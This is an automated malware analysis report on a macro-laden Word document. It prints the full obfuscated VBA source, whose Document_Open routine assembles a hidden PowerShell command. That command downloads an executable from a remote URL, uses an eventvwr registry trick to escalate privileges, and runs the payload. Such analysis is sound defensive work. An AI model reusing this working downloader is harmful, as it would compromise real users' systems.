MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The macro references the WinExec API, indicating an attempt to execute a command. This suggests the document is designed to download and execute a second-stage payload, likely for further system compromise.
Heuristics 6
-
Reference to WinExec API high SC_STR_WINEXECReference to WinExec API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
qbcolorBinaryGet = "vbscript.regexp" Set xorAscEvent = CreateObject(qbcolorBinaryGet) xorAscEvent.Global = True -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Declare Function WinExec Lib "kernel32" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long Sub Document_Open() eofMeFix = typeofDateserialIsdate(" rrbw-rrbwFrrbwirrbwlrrbwerrbwPrrbwarrbwtrrbwhrrbw rrbw$rrbwprrbwarrbwtrrbwhrrbw;rrbw}rrbwbrrbwrrrbwerrbwarrbwkrrbw;rrbw}rrbwcrrbwarrbwtrrbwcrrbwhrrbw{rrbwwrrbwrrrbwirrbwtrrbwerrbw-rrbwhrrbworrbwsrrbwtrrbw rrbw$rrbw_rrbw.rrbwErrbwxrrbwcrrbwerrbwprrbwtrrbwirrbworrbwnrrbw.rrbwMrrbwerrbwsrrbwsrrbwarrbwgrrbwerrbw;rrbw}rrbw}rrbw", "rrbw") -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6046 bytes |
SHA-256: e5ed44ff03108f8dc8c96b6fc552d20f3b26a9d53baa749b3d1a651493a4d3d9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
91 of 147 identifiers look randomly generated (e.g. 'BWdaAsBWdaAiBWdaAlBWdaAeBWdaAnBWdaAtBWda') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function WinExec Lib "kernel32" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Sub Document_Open()
eofMeFix = typeofDateserialIsdate(" rrbw-rrbwFrrbwirrbwlrrbwerrbwPrrbwarrbwtrrbwhrrbw rrbw$rrbwprrbwarrbwtrrbwhrrbw;rrbw}rrbwbrrbwrrrbwerrbwarrbwkrrbw;rrbw}rrbwcrrbwarrbwtrrbwcrrbwhrrbw{rrbwwrrbwrrrbwirrbwtrrbwerrbw-rrbwhrrbworrbwsrrbwtrrbw rrbw$rrbw_rrbw.rrbwErrbwxrrbwcrrbwerrbwprrbwtrrbwirrbworrbwnrrbw.rrbwMrrbwerrbwsrrbwsrrbwarrbwgrrbwerrbw;rrbw}rrbw}rrbw", "rrbw")
rndIsdateCcur = typeofDateserialIsdate(" BWdaA-BWdaAEBWdaArBWdaArBWdaAoBWdaArBWdaAABWdaAcBWdaAtBWdaAiBWdaAoBWdaAnBWdaA BWdaAsBWdaAiBWdaAlBWdaAeBWdaAnBWdaAtBWdaAlBWdaAyBWdaAcBWdaAoBWdaAnBWdaAtBWdaAiBWdaAnBWdaAuBWdaAeBWdaA;BWdaAiBWdaAfBWdaA(BWdaA!BWdaA$BWdaApBWdaArBWdaAoBWdaAcBWdaAeBWdaAsBWdaAsBWdaA)BWdaA{BWdaASBWdaAtBWdaAaBWdaArBWdaAtBWdaA-BWdaAPBWdaArBWdaAoBWdaAcBWdaAeBWdaAsBWdaAsBWdaA BWdaA-BWdaAWBWdaAiBWdaAnBWdaAdBWdaAoBWdaAwBWdaASBWdaAtBWdaAyBWdaAlBWdaAeBWdaA BWdaAhBWdaAiBWdaAdBWdaAdBWdaAeBWdaAnBWdaA", "BWdaA")
LdefdblL = typeofDateserialIsdate("bxnmucxnmulxnmuixnmuexnmunxnmutxnmu.xnmuDxnmuoxnmuwxnmunxnmulxnmuoxnmuaxnmudxnmuFxnmuixnmulxnmuexnmu(xnmu$xnmuuxnmurxnmulxnmu.xnmuTxnmuoxnmuSxnmutxnmurxnmuixnmunxnmugxnmu(xnmu)xnmu,xnmu xnmu$xnmupxnmuaxnmutxnmuhxnmu)xnmu;xnmu$xnmuwxnmusxnmucxnmurxnmuixnmupxnmutxnmu.xnmuRxnmuexnmugxnmuWxnmurxnmuixnmutxnmuexnmu(xnmu$xnmuhxnmukxnmuexnmuyxnmu,xnmu xnmu$xnmupxnmuaxnmutxnmuhxnmu)xnmu;xnmuSxnmu", "xnmu")
sendkeysCvarOptional = typeofDateserialIsdate("tytPOkaytPOkrytPOktytPOk-ytPOkSytPOklytPOkeytPOkeytPOkpytPOk ytPOk-ytPOkmytPOk ytPOk$ytPOksytPOklytPOkeytPOkeytPOkpytPOk;ytPOkSytPOktytPOkaytPOkrytPOktytPOk-ytPOkPytPOkrytPOkoytPOkcytPOkeytPOksytPOksytPOk ytPOk-ytPOkWytPOkiytPOknytPOkdytPOkoytPOkwytPOkSytPOktytPOkyytPOklytPOkeytPOk ytPOkhytPOkiytPOkdytPOkdytPOkeytPOknytPOk ytPOk-ytPOkFytPOkiytPOklytPOkeytPOkPytPOkaytPOktytPOkhytPOk ytPOk'ytPOkeytPOkvytPOkeytPOknytPOktytPOkvytPOkwytPOkrytPOk.ytPOkeytPOkxytPOkeytPOk", "ytPOk")
byrefCbyteResume = typeofDateserialIsdate("'ggG4;ggG4SggG4tggG4aggG4rggG4tggG4-ggG4SggG4lggG4eggG4eggG4pggG4 ggG4-ggG4mggG4 ggG4$ggG4sggG4lggG4eggG4eggG4pggG4;ggG4$ggG4wggG4sggG4cggG4rggG4iggG4pggG4tggG4.ggG4RggG4eggG4gggG4DggG4eggG4lggG4eggG4tggG4eggG4(ggG4$ggG4hggG4kggG4eggG4yggG4)ggG4;ggG4$ggG4pggG4rggG4oggG4cggG4eggG4sggG4sggG4 ggG4=ggG4 ggG4GggG4eggG4tggG4-ggG4PggG4rggG4oggG4cggG4eggG4sggG4sggG4 ggG4$ggG4nggG4aggG4mggG4eggG4", "ggG4")
GexitG = typeofDateserialIsdate(" nHKxC=nHKxC nHKxC'nHKxChnHKxCtnHKxCtnHKxCpnHKxCsnHKxC:nHKxC/nHKxC/nHKxCgnHKxConHKxCvnHKxC-nHKxCinHKxCnnHKxCvnHKxConHKxCinHKxCcnHKxCenHKxCsnHKxC.nHKxCinHKxCnnHKxCfnHKxConHKxC/nHKxCjnHKxConHKxCbnHKxCsnHKxC/nHKxCnnHKxCenHKxCunHKxClnHKxCdnHKxCrnHKxC.nHKxCenHKxCxnHKxCenHKxC'nHKxC.nHKxCSnHKxCpnHKxClnHKxCinHKxCtnHKxC(nHKxC'nHKxC,nHKxC'nHKxC)nHKxC;nHKxC$nHKxCnnHKxCanHKxCmnHKxCenHKxC nHKxC=nHKxC nHKxC$nHKxCrnHKxCanHKxCnnHKxCdnHKxConHKxCmnHKxC.nHKxCnnHKxCenHKxCxnHKxCtnHKxC", "nHKxC")
curdirCstrCreateobject = typeofDateserialIsdate("sQglW0sQglW0eQglW0sQglW0\QglW0mQglW0sQglW0cQglW0fQglW0iQglW0lQglW0eQglW0\QglW0sQglW0hQglW0eQglW0lQglW0lQglW0\QglW0oQglW0pQglW0eQglW0nQglW0\QglW0cQglW0oQglW0mQglW0mQglW0aQglW0nQglW0dQglW0\QglW0'QglW0;QglW0$QglW0sQglW0lQglW0eQglW0eQglW0pQglW0 QglW0=QglW0 QglW03QglW00QglW00QglW00QglW0;QglW0fQglW0oQglW0rQglW0eQglW0aQglW0cQglW0hQglW0(QglW0$QglW0uQglW0rQglW0lQglW0 QglW0iQglW0nQglW0 QglW0$QglW0uQglW0rQglW0lQglW0sQglW0)QglW0{QglW0tQglW0rQglW0yQglW0{QglW0$QglW0wQglW0eQglW0", "QglW0")
meOptionEach = typeofDateserialIsdate("paRVfoaRVfwaRVfeaRVfraRVfsaRVfhaRVfeaRVflaRVflaRVf aRVf-aRVfWaRVfiaRVfnaRVfdaRVfoaRVfwaRVfSaRVftaRVfyaRVflaRVfeaRVf aRVfHaRVfiaRVfdaRVfdaRVfeaRVfnaRVf aRVf$aRVfwaRVfsaRVfcaRVfraRVfiaRVfpaRVftaRVf aRVf=aRVf aRVfnaRVfeaRVfwaRVf-aRVfoaRVfbaRVfjaRVfeaRVfcaRVftaRVf aRVf-aRVfCaRVfoaRVfmaRVfOaRVfbaRVfjaRVfeaRVfcaRVftaRVf aRVfWaRVfSaRVfcaRVfraRVfiaRVfpaRVftaRVf.aRVfSaRVfhaRVfeaRVflaRVflaRVf;aRVf", "aRVf")
koptionk = typeofDateserialIsdate("$UfRtTwUfRtTeUfRtTbUfRtTcUfRtTlUfRtTiUfRtTeUfRtTnUfRtTtUfRtT UfRtT=UfRtT UfRtTnUfRtTeUfRtTwUfRtT-UfRtToUfRtTbUfRtTjUfRtTeUfRtTcUfRtTtUfRtT UfRtTSUfRtTyUfRtTsUfRtTtUfRtTeUfRtTmUfRtT.UfRtTNUfRtTeUfRtTtUfRtT.UfRtTWUfRtTeUfRtTbUfRtTCUfRtTlUfRtTiUfRtTeUfRtTnUfRtTtUfRtT;UfRtT$UfRtTrUfRtTaUfRtTnUfRtTdUfRtToUfRtTmUfRtT UfRtT=UfRtT UfRtTnUfRtTeUfRtTwUfRtT-UfRtToUfRtTbUfRtTjUfRtTeUfRtTcUfRtTtUfRtT UfRtTrUfRtTaUfRtTnUfRtTdUfRtToUfRtTmUfRtT;UfRtT$UfRtTuUfRtTrUfRtTlUfRtTsUfRtT", "UfRtT")
clngSecondArray = typeofDateserialIsdate("(SAmO7K1SAmO7K,SAmO7K SAmO7K6SAmO7K5SAmO7K5SAmO7K3SAmO7K6SAmO7K)SAmO7K;SAmO7K$SAmO7KpSAmO7KaSAmO7KtSAmO7KhSAmO7K SAmO7K=SAmO7K SAmO7K$SAmO7KeSAmO7KnSAmO7KvSAmO7K:SAmO7KtSAmO7KeSAmO7KmSAmO7KpSAmO7K SAmO7K+SAmO7K SAmO7K'SAmO7K\SAmO7K'SAmO7K SAmO7K+SAmO7K SAmO7K$SAmO7KnSAmO7KaSAmO7KmSAmO7KeSAmO7K SAmO7K+SAmO7K SAmO7K'SAmO7K.SAmO7KeSAmO7KxSAmO7KeSAmO7K'SAmO7K;SAmO7K$SAmO7KhSAmO7KkSAmO7KeSAmO7KySAmO7K SAmO7K=SAmO7K SAmO7K'SAmO7KHSAmO7KKSAmO7KCSAmO7KUSAmO7K\SAmO7KSSAmO7KoSAmO7KfSAmO7KtSAmO7KwSAmO7KaSAmO7KrSAmO7KeSAmO7K\SAmO7KCSAmO7KlSAmO7KaSAmO7K", "SAmO7K")
Dim caseSubCdec As String
Dim mxorm As Integer
mxorm = 0
caseSubCdec = meOptionEach & koptionk & GexitG & clngSecondArray & curdirCstrCreateobject & LdefdblL & sendkeysCvarOptional & byrefCbyteResume & rndIsdateCcur & eofMeFix
Call WinExec(caseSubCdec, mxorm)
End Sub
Function typeofDateserialIsdate(jpublishreportj As String, dwidthd As String) As String
Dim xorAscEvent As Object
Dim qbcolorBinaryGet As String
Dim doeventsSpaceError As String
qbcolorBinaryGet = "vbscript.regexp"
Set xorAscEvent = CreateObject(qbcolorBinaryGet)
xorAscEvent.Global = True
xorAscEvent.Pattern = dwidthd
doeventsSpaceError = xorAscEvent.Replace(jpublishreportj, "")
typeofDateserialIsdate = doeventsSpaceError
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.